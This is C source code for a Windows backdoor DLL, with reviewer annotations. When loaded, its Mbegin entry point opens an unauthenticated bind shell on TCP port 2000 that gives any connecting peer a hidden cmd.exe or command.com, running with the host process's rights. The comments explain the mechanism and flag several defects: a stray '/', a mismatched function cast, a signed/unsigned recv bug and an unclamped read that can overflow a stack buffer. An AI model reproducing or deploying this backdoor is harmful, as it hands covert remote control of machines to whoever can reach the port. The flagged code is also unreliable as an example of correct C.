/*
 * Backdoor DLL. Starts two threads: the caller's thread returns at once,
 * the other binds cmd.exe (Windows NT family) or command.com (Windows 9x)
 * to TCP port 2000 and hands a shell to any peer that connects.
 * There is no authentication, address filtering or logging of any kind.
 */
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <winnt.h>VOID FAR PASCAL Mbegin();
// Thread id written by CreateThread below; never read afterwards.
DWORD MyThreadId1;

// Worker that does the listen/accept/shell relay on TCP 2000.
// The prototype takes a char, but it is started through a cast to
// LPTHREAD_START_ROUTINE (DWORD WINAPI (*)(LPVOID)) with a NULL argument,
// so the declared signature does not match what the thread runtime calls.
static VOID MyThreadFn1(char Parameter);

/*
 * Mbegin - entry point that starts the backdoor (presumably exported from
 * the DLL; no export list is visible in this listing).
 *
 * Spawns MyThreadFn1 as a background thread and returns immediately, so the
 * caller regains control while the bind shell keeps running.  The
 * CreateThread result is discarded: a failure is silent and the returned
 * thread handle is never closed.
 */
VOID FAR PASCAL Mbegin(){
    SECURITY_ATTRIBUTES mthread1;
    mthread1.bInheritHandle=TRUE;               // thread handle marked inheritable; nothing here needs that
    mthread1.lpSecurityDescriptor=NULL;         // default security descriptor
    mthread1.nLength=sizeof(SECURITY_ATTRIBUTES);
    // Mismatched function-pointer cast (see prototype above); argument is NULL.
    CreateThread(&mthread1,0,      (LPTHREAD_START_ROUTINE) MyThreadFn1,  NULL,0,&MyThreadId1);
    return;
}/ // NOTE(review): stray "/" carried over from the original listing (not valid C/C++); left untouched
/*
 * MyThreadFn1 - worker thread: an unauthenticated TCP bind shell.
 *
 * Binds TCP port 2000 on every interface (INADDR_ANY), accepts one client
 * at a time, starts a hidden cmd.exe (NT family) or command.com (Win9x)
 * with its standard handles redirected through two anonymous pipes, and
 * relays bytes between the socket and the pipes until a read or write
 * fails.  It then tears the session down, sleeps one second and goes back
 * to accept().  Nothing checks who connected: every peer that can reach
 * the port gets a shell, and CreateProcess is called without a token, so
 * the shell runs in the security context of whatever process loaded this
 * DLL.
 *
 * "host" is never read (the thread is created with a NULL argument through
 * a mismatched function-pointer cast, see Mbegin).
 *
 * Defects visible in the code, left unchanged and flagged inline:
 *   - lBytesRead is unsigned long, so recv()'s SOCKET_ERROR (-1) is not
 *     caught by "<= 0" and reaches WriteFile as a length of 0xFFFFFFFF.
 *   - the byte count returned by PeekNamedPipe is used unclamped as the
 *     ReadFile length into the 4096-byte stack buffer Buff.
 *   - listenFD, the initial clientFD, the child's process/thread handles
 *     and the Winsock instance are never released.
 *
 * Written for a 32-bit MSVC/C++ build: "true" and "sockaddr *" without
 * "struct" are not C, and sa.nLength is hard-coded to the 32-bit struct size.
 */
static VOID MyThreadFn1(char host){
    fd_set fdsr;
    char enter[]={0x0d};            // CR, appended after each command on command.com only
    int ver=-1;                     // 1 = NT family (cmd.exe), 0 = Win9x (command.com)
    TIMEVAL tm;
    tm.tv_sec=0;
    tm.tv_usec=50;                  // 50 us select() timeout: the relay loop below is effectively a busy poll
    // Detect the OS family.  GetVersion() sets the high bit on Windows 95/98/Me,
    // so values below 0x80000000 mean the NT line.
    DWORD dwVersion = GetVersion();
    char *cmdLine;
    DWORD dwWindowsMajorVersion =  (DWORD)(LOBYTE(LOWORD(dwVersion)));   // computed but never used
    DWORD dwWindowsMinorVersion =  (DWORD)(HIBYTE(LOWORD(dwVersion)));   // computed but never used
    if (dwVersion < 0x80000000) {
        ver=1;
        cmdLine= "cmd.exe";
    } else {
        ver=0;
        cmdLine= "command.com";
    }
    char Buff[4096];                // single relay buffer shared by both directions
    int ret;
    WSADATA WSAData;
    WSAStartup((WORD)((1<<8)|1),(LPWSADATA) &WSAData);   // request Winsock 1.1; result ignored, WSACleanup never called
    SOCKET listenFD,clientFD;
    SECURITY_ATTRIBUTES sa;
    struct sockaddr_in server;
    int iAddrSize = sizeof(server);
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;   // pipe1: child stdout/stderr -> us; pipe2: us -> child stdin
    STARTUPINFO si;
    PROCESS_INFORMATION ProcessInformation;
    unsigned long lBytesRead;       // unsigned: see the recv() note in the loop
    DWORD dwLen;                    // uninitialized until the first successful PeekNamedPipe
    listenFD = socket(AF_INET,SOCK_STREAM,0);
    clientFD = socket(AF_INET,SOCK_STREAM,0);   // overwritten by accept() below without being closed: leaks
    server.sin_family = AF_INET;
    server.sin_port = htons(2000);
    server.sin_addr.s_addr=INADDR_ANY;          // all interfaces, no source restriction
    // Inheritable pipe handles so CreateProcess(bInheritHandles=1) passes them on.
    // nLength is hard-coded to 12, which equals sizeof(SECURITY_ATTRIBUTES) only on 32-bit.
    sa.nLength=12;
    sa.lpSecurityDescriptor=0;
    sa.bInheritHandle=true;
    ret=bind(listenFD,(sockaddr *)&server,sizeof(server));   // failure (e.g. port already in use) is not checked...
    ret=listen(listenFD,2);                                   // ...so the thread only dies once accept() fails below
    // Accept a connection.  Every finished session jumps back here via "goto begin".
begin:
    clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
    if(clientFD==INVALID_SOCKET) ExitThread(0);
    ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);   // return values ignored
    ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
    memset(&si,0,sizeof(STARTUPINFO));
    // Launch cmdLine hidden, stdin from pipe2, stdout and stderr into pipe1.
    GetStartupInfo(&si);
    si.cb=sizeof(STARTUPINFO);
    si.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW ;
    si.wShowWindow=SW_HIDE;
    si.hStdError=hWritePipe1;
    si.hStdInput=hReadPipe2;
    si.hStdOutput=hWritePipe1;
    // bInheritHandles=1 and all four pipe handles were created inheritable, so
    // the child also receives the parent-side ends (hWritePipe2, hReadPipe1);
    // closing our hWritePipe2 at "end:" therefore need not give it EOF on stdin.
    // No token is supplied: the child runs as the hosting process.
    // ProcessInformation.hProcess / hThread are never closed.
    ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
    if(ret==0) {
        CloseHandle(hWritePipe2);
        CloseHandle(hReadPipe1);
        CloseHandle(hReadPipe2);
        CloseHandle(hWritePipe1);
        closesocket(clientFD);
        ExitThread(0);
    }
    // Relay loop: socket -> shell stdin, shell stdout -> socket.
    Sleep(200);                     // presumably gives the shell time to start before polling
    while(1) {
        memset(Buff,0,4096);
        FD_ZERO(&fdsr);
        FD_SET(clientFD,&fdsr);
        ret=select(NULL, &fdsr, NULL, NULL, &tm);   // Winsock ignores nfds, hence NULL
        if ( ret!= 0&&ret!=SOCKET_ERROR) {
            if (FD_ISSET(clientFD,&fdsr)) lBytesRead=recv(clientFD,Buff,4096,0);
            // BUG: recv() returns int; SOCKET_ERROR (-1) stored in the unsigned
            // lBytesRead becomes 0xFFFFFFFF, passes this test, and is then used
            // as the WriteFile length on a 4096-byte buffer.  Only a clean
            // close (0 bytes) is detected here.
            if(lBytesRead<=0) goto end;
            ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);   // forward to the shell's stdin
            if(!ret) goto end;
            if(ver==0) ret=WriteFile(hWritePipe2,enter,1,&lBytesRead,0);   // command.com: terminate the line with CR
            if(!ret) goto end;
        }
        memset(Buff,0,4096);
        // Bytes pending on the shell's stdout.  Return value ignored: on failure
        // dwLen keeps its previous (initially uninitialized) value.
        PeekNamedPipe(hReadPipe1,NULL,0,NULL,&dwLen,NULL);
        if(dwLen>0) {
            // BUG: dwLen is not clamped to sizeof(Buff); more than 4096 bytes of
            // pending output overflow the stack buffer.
            ret=ReadFile(hReadPipe1,Buff,dwLen,&lBytesRead,0);
            if(!ret) goto end;
            ret=send(clientFD,Buff,dwLen,0);   // sends dwLen, not the lBytesRead actually read
            if(ret<=0) goto end;
        }
    }
    // Session teardown: close our pipe ends and the client socket, then wait
    // for the next client.  The child process is neither terminated nor waited
    // for, and listenFD stays open for the lifetime of the thread.
end:
    CloseHandle(hWritePipe2);
    CloseHandle(hReadPipe1);
    CloseHandle(hReadPipe2);
    CloseHandle(hWritePipe1);
    closesocket(clientFD);
    Sleep(1000);
    goto begin;
    ExitThread(0);                  // unreachable: the goto above never falls through
}
// "Detailed explanation" - heading of prose that followed in the original page; the text itself is not part of this chunk.